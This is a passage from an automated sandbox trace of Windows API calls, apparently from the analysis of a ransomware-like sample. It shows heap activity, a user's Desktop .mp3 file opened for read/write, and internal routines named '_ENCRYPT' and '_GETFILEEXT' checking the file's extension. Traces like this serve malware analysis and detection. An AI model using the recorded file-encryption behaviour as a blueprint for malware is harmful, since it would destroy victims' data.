(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.457] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tlkm8g.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=49, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x62) returned 0x7c10a8 [0030.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=49, lpWideCharStr=0x7c10a8, cchWideChar=49 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3") returned 49 [0030.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0030.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0030.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.459] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.461] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0030.461] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.462] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.462] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0030.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c8b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.463] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0030.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.463] CloseHandle (hObject=0x128) returned 1 [0030.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.463] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.464] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.464] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.464] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.464] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.464] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.464] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.464] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.464] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.464] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.464] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6c11b0, ftCreationTime.dwHighDateTime=0x1d5c0d9, ftLastAccessTime.dwLowDateTime=0xdf97b070, ftLastAccessTime.dwHighDateTime=0x1d5c46c, ftLastWriteTime.dwLowDateTime=0xdf97b070, ftLastWriteTime.dwHighDateTime=0x1d5c46c, nFileSizeHigh=0x0, nFileSizeLow=0x165c8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="TLkm8G.mp3", cAlternateFileName="")) returned 0x7c20c0 [0030.465] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.465] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.465] 